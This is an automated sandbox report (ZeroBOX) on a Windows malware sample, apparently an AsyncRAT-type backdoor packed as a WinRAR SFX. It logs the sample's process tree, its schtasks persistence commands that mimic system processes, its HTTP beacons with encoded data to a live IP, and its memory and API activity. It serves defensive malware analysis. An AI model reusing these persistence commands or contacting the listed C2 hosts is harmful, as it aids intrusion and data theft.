Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	June 12, 2021, 6:22 p.m.	June 12, 2021, 6:26 p.m.

Size	999.7KB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`3a0d3b0857330b3f4f026cb41bfad1a5`
SHA256	`204b4b167dbfff62e505a69da03fc072f6714e4578ced8e3068e15cad158e914`
CRC32	`6CBC3960`
ssdeep	`24576:U2G/nvxW3Ww0tkvdD7hJIPuy2tkshCc+i:UbA3067nqshoi`
PDB Path	D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb
Yara	NPKI_Zero - File included NPKI Win_Backdoor_AsyncRAT_Zero - Win Backdoor AsyncRAT Win32_Trojan_Gen_1_0904B0_Zero - Win32 Trojan Emotet PE_Header_Zero - PE File Signature OS_Processor_Check_Zero - OS Processor Check Win32_Trojan_Gen_2_0904B0_Zero - Win32 Trojan Gen IsPE32 - (no description)

12.exe "C:\Users\test22\AppData\Local\Temp\12.exe"
4656
- wscript.exe "C:\Windows\System32\WScript.exe" "C:\FontWinintohostNet\UWE3BhTNVatEksTFn0CppPafAWK.vbe"
  7948
  - cmd.exe cmd /c ""C:\FontWinintohostNet\u8hVPpfkR4YIk505GPamOvaaPm.bat" "
    8956
    - FontWinintohostNetrefperfsvc.exe "C:\FontWinintohostNet\FontWinintohostNetrefperfsvc.exe"
      6952
      - schtasks.exe "schtasks" /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Program Files (x86)\Common Files\Services\WmiPrvSE.exe'" /rl HIGHEST /f
        4220
      - schtasks.exe "schtasks" /create /tn "wininit" /sc ONLOGON /tr "'C:\tmpzdcjvb\bin\wininit.exe'" /rl HIGHEST /f
        1812
      - schtasks.exe "schtasks" /create /tn "cmd" /sc ONLOGON /tr "'C:\Windows\SysWOW64\osk\cmd.exe'" /rl HIGHEST /f
        8408
      - schtasks.exe "schtasks" /create /tn "csrss" /sc ONLOGON /tr "'C:\Sandbox\test22\DefaultBox\user\all\Microsoft\Windows\Caches\csrss.exe'" /rl HIGHEST /f
        1036
      - schtasks.exe "schtasks" /create /tn "SearchIndexer" /sc ONLOGON /tr "'C:\Recovery\ab7d780a-0706-11e8-9512-b992fd7a33be\SearchIndexer.exe'" /rl HIGHEST /f
        5860
      - cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\FontWinintohostNet\8MzrE1G1pe.bat"
        4440
        
        chcp.com chcp 65001
        3944
        
        PING.EXE ping -n 5 localhost
        8700
        
        SearchIndexer.exe "C:\Recovery\ab7d780a-0706-11e8-9512-b992fd7a33be\SearchIndexer.exe"
        3460

Name	Response	Post-Analysis Lookup
ipinfo.io	A 34.117.59.81	34.117.59.81

IP Address	Status	Action
104.21.80.171	Active	Moloch
162.0.210.44	Active	Moloch
162.0.220.187	Active	Moloch
164.124.101.2	Active	Moloch
172.217.25.14	Active	Moloch
198.13.62.186	Active	Moloch
34.117.59.81	Active	Moloch
82.146.43.69	Active	Moloch
192.243.59.20	Active	Moloch
213.174.155.130	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.102:49827 -> 34.117.59.81:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.102:49827 -> 34.117.59.81:443	906200022	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 34.117.59.81:443 -> 192.168.56.102:49827	2025330	ET POLICY Possible External IP Lookup SSL Cert Observed (ipinfo.io)	Device Retrieving External IP Address Detected

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLS 1.2 192.168.56.102:49827 34.117.59.81:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1D4	CN=ipinfo.io	43:26:3d:5a:7e:4a:bc:f7:21:b5:d0:00:f1:49:6c:a5:bf:d1:ff:e7

Queries for the computername (22 events)

Time & API	Arguments	Status	Return
GetComputerNameW June 12, 2021, 6:22 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 12, 2021, 6:22 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 12, 2021, 6:22 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 12, 2021, 6:22 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 12, 2021, 6:22 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 12, 2021, 6:22 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 12, 2021, 6:22 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 12, 2021, 6:22 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 12, 2021, 6:22 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 12, 2021, 6:22 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 12, 2021, 6:22 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 12, 2021, 6:22 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 12, 2021, 6:22 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 12, 2021, 6:22 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 12, 2021, 6:22 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 12, 2021, 6:22 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 12, 2021, 6:23 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 12, 2021, 6:23 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 12, 2021, 6:23 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 12, 2021, 6:23 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 12, 2021, 6:23 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 12, 2021, 6:23 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (4 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent June 12, 2021, 6:22 p.m.			0	0
IsDebuggerPresent June 12, 2021, 6:22 p.m.			0	0
IsDebuggerPresent June 12, 2021, 6:22 p.m.			0	0
IsDebuggerPresent June 12, 2021, 6:22 p.m.			0	0

Command line console output was observed (9 events)

Time & API	Arguments	Status	Return
WriteConsoleW June 12, 2021, 6:22 p.m.	buffer: C:\FontWinintohostNet> console_handle: 0x00000007	1	1
WriteConsoleW June 12, 2021, 6:22 p.m.	buffer: "C:\FontWinintohostNet\FontWinintohostNetrefperfsvc.exe" console_handle: 0x00000007	1	1
WriteConsoleW June 12, 2021, 6:22 p.m.	buffer: SUCCESS: The scheduled task "WmiPrvSE" has successfully been created. console_handle: 0x0000000000000007	1	1
WriteConsoleW June 12, 2021, 6:22 p.m.	buffer: SUCCESS: The scheduled task "wininit" has successfully been created. console_handle: 0x0000000000000007	1	1
WriteConsoleW June 12, 2021, 6:22 p.m.	buffer: SUCCESS: The scheduled task "cmd" has successfully been created. console_handle: 0x0000000000000007	1	1
WriteConsoleW June 12, 2021, 6:22 p.m.	buffer: SUCCESS: The scheduled task "csrss" has successfully been created. console_handle: 0x0000000000000007	1	1
WriteConsoleW June 12, 2021, 6:22 p.m.	buffer: SUCCESS: The scheduled task "SearchIndexer" has successfully been created. console_handle: 0x0000000000000007	1	1
WriteConsoleW June 12, 2021, 6:22 p.m.	buffer: The batch file cannot be found. console_handle: 0x000000000000000b	1	1
WriteConsoleW June 12, 2021, 6:22 p.m.	buffer: Active code page: 65001 console_handle: 0x0000000000000013	1	1

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

This executable has a PDB path (1 event)

pdb_path

D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx June 12, 2021, 6:22 p.m.		1	1	0

The executable contains unknown PE section names indicative of a packer (could be a false positive) (1 event)

section

.didat

The file contains an unknown PE resource name possibly indicative of a packer (1 event)

resource name

PNG

One or more processes crashed (1 event)

Time & API	Arguments	Status	Return	Repeated
__exception__ June 12, 2021, 6:23 p.m.	stacktrace: 0x7fe92ed8bfa 0x7fe92ed89db 0x7fe92ed8911 0x7fe92ecdf78 mscorlib+0x4ef8a5 @ 0x7feecf9f8a5 mscorlib+0x4ef609 @ 0x7feecf9f609 mscorlib+0x4ef5c7 @ 0x7feecf9f5c7 mscorlib+0x502d21 @ 0x7feecfb2d21 CoUninitializeEE+0x4c56f GetMetaDataInternalInterface-0x2b1ad clr+0x4f713 @ 0x7fef252f713 CoUninitializeEE+0x4c09e GetMetaDataInternalInterface-0x2b67e clr+0x4f242 @ 0x7fef252f242 CoUninitializeEE+0x4c167 GetMetaDataInternalInterface-0x2b5b5 clr+0x4f30b @ 0x7fef252f30b NGenCreateNGenWorker+0x682d _AxlPublicKeyBlobToPublicKeyToken-0x409df clr+0x216291 @ 0x7fef26f6291 DestroyAssemblyConfigCookie+0x157fc PreBindAssembly-0xc054 clr+0xf6d80 @ 0x7fef25d6d80 DestroyAssemblyConfigCookie+0x1578a PreBindAssembly-0xc0c6 clr+0xf6d0e @ 0x7fef25d6d0e DestroyAssemblyConfigCookie+0x15701 PreBindAssembly-0xc14f clr+0xf6c85 @ 0x7fef25d6c85 DestroyAssemblyConfigCookie+0x15837 PreBindAssembly-0xc019 clr+0xf6dbb @ 0x7fef25d6dbb NGenCreateNGenWorker+0x6711 _AxlPublicKeyBlobToPublicKeyToken-0x40afb clr+0x216175 @ 0x7fef26f6175 StrongNameSignatureVerification+0x5a22 GetCLRFunction-0x7712 clr+0x1866ae @ 0x7fef26666ae BaseThreadInitThunk+0xd CreateThread-0x53 kernel32+0x1652d @ 0x76e5652d RtlUserThreadStart+0x21 strchr-0x3df ntdll+0x2c521 @ 0x771ec521 exception.instruction_r: 80 38 00 48 8b 4c 24 40 48 8b 54 24 48 e8 b4 df exception.instruction: cmp byte ptr [rax], 0 exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x7fe92ed8bfa registers.r14: 0 registers.r15: 0 registers.rcx: 0 registers.rsi: 0 registers.r10: 8789968454496 registers.rbx: 0 registers.rsp: 479328240 registers.r11: 479323136 registers.r8: 38831716 registers.r9: 22518466294644837 registers.rdx: 38831688 registers.r12: 0 registers.rbp: 0 registers.rdi: 0 registers.rax: 0 registers.r13: 0	1	0	0

Time & API

Arguments

Status

Return

Repeated

__exception__

June 12, 2021, 6:23 p.m.

stacktrace:

0x7fe92ed8bfa
0x7fe92ed89db
0x7fe92ed8911
0x7fe92ecdf78
mscorlib+0x4ef8a5 @ 0x7feecf9f8a5
mscorlib+0x4ef609 @ 0x7feecf9f609
mscorlib+0x4ef5c7 @ 0x7feecf9f5c7
mscorlib+0x502d21 @ 0x7feecfb2d21
CoUninitializeEE+0x4c56f GetMetaDataInternalInterface-0x2b1ad clr+0x4f713 @ 0x7fef252f713
CoUninitializeEE+0x4c09e GetMetaDataInternalInterface-0x2b67e clr+0x4f242 @ 0x7fef252f242
CoUninitializeEE+0x4c167 GetMetaDataInternalInterface-0x2b5b5 clr+0x4f30b @ 0x7fef252f30b
NGenCreateNGenWorker+0x682d _AxlPublicKeyBlobToPublicKeyToken-0x409df clr+0x216291 @ 0x7fef26f6291
DestroyAssemblyConfigCookie+0x157fc PreBindAssembly-0xc054 clr+0xf6d80 @ 0x7fef25d6d80
DestroyAssemblyConfigCookie+0x1578a PreBindAssembly-0xc0c6 clr+0xf6d0e @ 0x7fef25d6d0e
DestroyAssemblyConfigCookie+0x15701 PreBindAssembly-0xc14f clr+0xf6c85 @ 0x7fef25d6c85
DestroyAssemblyConfigCookie+0x15837 PreBindAssembly-0xc019 clr+0xf6dbb @ 0x7fef25d6dbb
NGenCreateNGenWorker+0x6711 _AxlPublicKeyBlobToPublicKeyToken-0x40afb clr+0x216175 @ 0x7fef26f6175
StrongNameSignatureVerification+0x5a22 GetCLRFunction-0x7712 clr+0x1866ae @ 0x7fef26666ae
BaseThreadInitThunk+0xd CreateThread-0x53 kernel32+0x1652d @ 0x76e5652d
RtlUserThreadStart+0x21 strchr-0x3df ntdll+0x2c521 @ 0x771ec521

exception.instruction_r: 80 38 00 48 8b 4c 24 40 48 8b 54 24 48 e8 b4 df
exception.instruction: cmp byte ptr [rax], 0
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x7fe92ed8bfa
registers.r14: 0
registers.r15: 0
registers.rcx: 0
registers.rsi: 0
registers.r10: 8789968454496
registers.rbx: 0
registers.rsp: 479328240
registers.r11: 479323136
registers.r8: 38831716
registers.r9: 22518466294644837
registers.rdx: 38831688
registers.r12: 0
registers.rbp: 0
registers.rdi: 0
registers.rax: 0
registers.r13: 0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (2 events)

suspicious_features	Connection to IP address				suspicious_request	GET http://82.146.43.69/externalpython_Processorgame.php?GsIcs29GtjzW7s=B66jq6seOp&5WNGb9aNmsEibBFJ0AJylIl35k=7cYN3w47n3mHz&024460c38d1a807278c8431ced0b0904=4b7440ed015fe8fe3058245b94b19e91&fc3c3634ae1d8921db8402bb95b1565b=wY3AzM2ITM5YWNmljN3UDO4YDN5gjYjljMhZTO3M2YmZTOilTY2cjN&GsIcs29GtjzW7s=B66jq6seOp&5WNGb9aNmsEibBFJ0AJylIl35k=7cYN3w47n3mHz
suspicious_features	Connection to IP address				suspicious_request	GET http://82.146.43.69/externalpython_Processorgame.php?GsIcs29GtjzW7s=B66jq6seOp&5WNGb9aNmsEibBFJ0AJylIl35k=7cYN3w47n3mHz&bb3ddb2219372e793395286708ab7007=gM4UWNmFGZwgjN2AjNyQWMwQmZyITOzkzNxEDN2QzYiZDZ5ADOkhDZyEDNykjM1ITOzAjNxYTO&fc3c3634ae1d8921db8402bb95b1565b=ANxYmZ0ETN3QzNhZ2MzQWZkRjM2UGOzU2N5I2YyEDZmNjZ0YjZ1kDZ&cd8054709f69449745e1d9b91abbd92e=d1nIjFGNihzNmRzYzQjY4YTYwIzN1UDNwIWZlJ2MkVjNzUWZ3QTZ3QzMmJiOiI2NjZDZ4QWZxMTM1MWMxEmY4YjMhVTY5U2M5MjMiN2NiwiI0AzMmVGMwQzYwEmM5QWN3MWO4QGNkJGZ5QzMzQTMwM2YlBDN0MTM2IiOiIzNxEzN5QGOzMzM5YTZ3gDNzEzMmlzN3gTZ3gDZ2IDOis3W&c7b940f6c4fda35f1571cd148ec3856b=d1nIiojI1UjYkljZidzMlZjYwYWNzUDO3YzYwIjYyITNmJ2N5EmIsIyYhRjY4cjZ0M2M0IGO2EGMycTN1QDMiVWZiNDZ1YzMlV2N0U2N0MjZiojIidzY2QGOkVWMzETNjFTMhJGO2ITY1EWOlNTOzIjYjdjIsICNwMjZlBDM0MGMhJTOkVzNjlDOkRDZiRWO0MzM0EDMjNWZwQDNzEjNiojIycTMxcTOkhzMzMTO2U2N4QzMxMjZ5czN4U2N4QmNygjI7xSfikjSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJN1Vp9maJVHbXJ2aGBzYwp0QMlGNrlkNJNlYo5UbZxGZxMGcKNETptGbJZTSTpVd5cUY3lTbjpGbXRles1WSzlUaJZTS5JlQSxWSzl0QkBnSFlEMZRUSPRXRJNnRtJmdsJzY6ZVbaZnSIV1ZjRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5o0QhBjVYllb1cVY65EWhRXODhlds1GT2pVbiBnQYFmd3FDTjBnejdnUIR2bKl2TpV1VitmRXpVeKNETpd3VkZnVyUld3ZVWw5EWRl2bqlEb1IjY2Y1ViBnUul0cJlmT0UkeNdXSp9Ua3dVWw40MidnSDxUawIjYqZ1RixmUGlEaW12Y2RXRJJTW65EMNZVUp9maJ5mSzIWa3lWSwcmeOVDNp5UeFRET3llaOFDN55keJl2Tp1kMiNnSDxUaJFzUp9maJVjSIRWdWNjYqp0QMl2dXRmdWJTVp9maJVXOXFmbW12YpdXaJNnVzIGbOxWS2k0UlBDbykVa3lWS3VFVNVXU61Ee0M0T3lkaMFzYU1UavpWS3xWbJdDcqlkda1mYKJEWTl2dplUeJREZ6Z1Rkl2bqlEbxcVWPpEWapnVsl0cJlXURFTaNlXUxUlRSxWS2k0UaRnRtRFRCxWSzl0QNVXSqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUTNiRWOmJ2NzUmNiBjZ1MTN4cjNjBjMiJjM1YmY3kTYiwiIhdDM1E2M5ITOmN2YxQTZzQjZ5U2MzYjZwUTNzU2NlBTYjNTM2MGNzIiOiI2NjZDZ4QWZxMTM1MWMxEmY4YjMhVTY5U2M5MjMiN2NiwiI0AzMmVGMwQzYwEmM5QWN3MWO4QGNkJGZ5QzMzQTMwM2YlBDN0MTM2IiOiIzNxEzN5QGOzMzM5YTZ3gDNzEzMmlzN3gTZ3gDZ2IDOis3W

Performs some HTTP requests (3 events)

request	GET http://82.146.43.69/externalpython_Processorgame.php?GsIcs29GtjzW7s=B66jq6seOp&5WNGb9aNmsEibBFJ0AJylIl35k=7cYN3w47n3mHz&024460c38d1a807278c8431ced0b0904=4b7440ed015fe8fe3058245b94b19e91&fc3c3634ae1d8921db8402bb95b1565b=wY3AzM2ITM5YWNmljN3UDO4YDN5gjYjljMhZTO3M2YmZTOilTY2cjN&GsIcs29GtjzW7s=B66jq6seOp&5WNGb9aNmsEibBFJ0AJylIl35k=7cYN3w47n3mHz
request	GET http://82.146.43.69/externalpython_Processorgame.php?GsIcs29GtjzW7s=B66jq6seOp&5WNGb9aNmsEibBFJ0AJylIl35k=7cYN3w47n3mHz&bb3ddb2219372e793395286708ab7007=gM4UWNmFGZwgjN2AjNyQWMwQmZyITOzkzNxEDN2QzYiZDZ5ADOkhDZyEDNykjM1ITOzAjNxYTO&fc3c3634ae1d8921db8402bb95b1565b=ANxYmZ0ETN3QzNhZ2MzQWZkRjM2UGOzU2N5I2YyEDZmNjZ0YjZ1kDZ&cd8054709f69449745e1d9b91abbd92e=d1nIjFGNihzNmRzYzQjY4YTYwIzN1UDNwIWZlJ2MkVjNzUWZ3QTZ3QzMmJiOiI2NjZDZ4QWZxMTM1MWMxEmY4YjMhVTY5U2M5MjMiN2NiwiI0AzMmVGMwQzYwEmM5QWN3MWO4QGNkJGZ5QzMzQTMwM2YlBDN0MTM2IiOiIzNxEzN5QGOzMzM5YTZ3gDNzEzMmlzN3gTZ3gDZ2IDOis3W&c7b940f6c4fda35f1571cd148ec3856b=d1nIiojI1UjYkljZidzMlZjYwYWNzUDO3YzYwIjYyITNmJ2N5EmIsIyYhRjY4cjZ0M2M0IGO2EGMycTN1QDMiVWZiNDZ1YzMlV2N0U2N0MjZiojIidzY2QGOkVWMzETNjFTMhJGO2ITY1EWOlNTOzIjYjdjIsICNwMjZlBDM0MGMhJTOkVzNjlDOkRDZiRWO0MzM0EDMjNWZwQDNzEjNiojIycTMxcTOkhzMzMTO2U2N4QzMxMjZ5czN4U2N4QmNygjI7xSfikjSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJN1Vp9maJVHbXJ2aGBzYwp0QMlGNrlkNJNlYo5UbZxGZxMGcKNETptGbJZTSTpVd5cUY3lTbjpGbXRles1WSzlUaJZTS5JlQSxWSzl0QkBnSFlEMZRUSPRXRJNnRtJmdsJzY6ZVbaZnSIV1ZjRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5o0QhBjVYllb1cVY65EWhRXODhlds1GT2pVbiBnQYFmd3FDTjBnejdnUIR2bKl2TpV1VitmRXpVeKNETpd3VkZnVyUld3ZVWw5EWRl2bqlEb1IjY2Y1ViBnUul0cJlmT0UkeNdXSp9Ua3dVWw40MidnSDxUawIjYqZ1RixmUGlEaW12Y2RXRJJTW65EMNZVUp9maJ5mSzIWa3lWSwcmeOVDNp5UeFRET3llaOFDN55keJl2Tp1kMiNnSDxUaJFzUp9maJVjSIRWdWNjYqp0QMl2dXRmdWJTVp9maJVXOXFmbW12YpdXaJNnVzIGbOxWS2k0UlBDbykVa3lWS3VFVNVXU61Ee0M0T3lkaMFzYU1UavpWS3xWbJdDcqlkda1mYKJEWTl2dplUeJREZ6Z1Rkl2bqlEbxcVWPpEWapnVsl0cJlXURFTaNlXUxUlRSxWS2k0UaRnRtRFRCxWSzl0QNVXSqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUTNiRWOmJ2NzUmNiBjZ1MTN4cjNjBjMiJjM1YmY3kTYiwiIhdDM1E2M5ITOmN2YxQTZzQjZ5U2MzYjZwUTNzU2NlBTYjNTM2MGNzIiOiI2NjZDZ4QWZxMTM1MWMxEmY4YjMhVTY5U2M5MjMiN2NiwiI0AzMmVGMwQzYwEmM5QWN3MWO4QGNkJGZ5QzMzQTMwM2YlBDN0MTM2IiOiIzNxEzN5QGOzMzM5YTZ3gDNzEzMmlzN3gTZ3gDZ2IDOis3W
request	GET https://ipinfo.io/json

Allocates read-write-execute memory (usually to unpack itself) (50 out of 200 events)

Time & API	Arguments	Status
NtProtectVirtualMemory June 12, 2021, 6:22 p.m.	process_identifier: 4656 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73772000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 12, 2021, 6:22 p.m.	process_identifier: 7948 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73772000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 12, 2021, 6:22 p.m.	process_identifier: 6952 region_size: 655360 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000570000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory June 12, 2021, 6:22 p.m.	process_identifier: 6952 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000590000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory June 12, 2021, 6:22 p.m.	process_identifier: 6952 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2401000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory June 12, 2021, 6:22 p.m.	process_identifier: 6952 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2a9b000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory June 12, 2021, 6:22 p.m.	process_identifier: 6952 region_size: 720896 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000020b0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory June 12, 2021, 6:22 p.m.	process_identifier: 6952 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000020e0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory June 12, 2021, 6:22 p.m.	process_identifier: 6952 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2402000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory June 12, 2021, 6:22 p.m.	process_identifier: 6952 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2402000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory June 12, 2021, 6:22 p.m.	process_identifier: 6952 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2402000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory June 12, 2021, 6:22 p.m.	process_identifier: 6952 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2402000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory June 12, 2021, 6:22 p.m.	process_identifier: 6952 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2402000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory June 12, 2021, 6:22 p.m.	process_identifier: 6952 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2402000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory June 12, 2021, 6:22 p.m.	process_identifier: 6952 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2402000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory June 12, 2021, 6:22 p.m.	process_identifier: 6952 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2402000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory June 12, 2021, 6:22 p.m.	process_identifier: 6952 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2402000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory June 12, 2021, 6:22 p.m.	process_identifier: 6952 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2402000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory June 12, 2021, 6:22 p.m.	process_identifier: 6952 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2402000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory June 12, 2021, 6:22 p.m.	process_identifier: 6952 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2404000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory June 12, 2021, 6:22 p.m.	process_identifier: 6952 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2404000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory June 12, 2021, 6:22 p.m.	process_identifier: 6952 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2404000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory June 12, 2021, 6:22 p.m.	process_identifier: 6952 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2404000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory June 12, 2021, 6:22 p.m.	process_identifier: 6952 region_size: 655360 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory June 12, 2021, 6:22 p.m.	process_identifier: 6952 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory June 12, 2021, 6:22 p.m.	process_identifier: 6952 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory June 12, 2021, 6:22 p.m.	process_identifier: 6952 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory June 12, 2021, 6:22 p.m.	process_identifier: 6952 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff00000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1
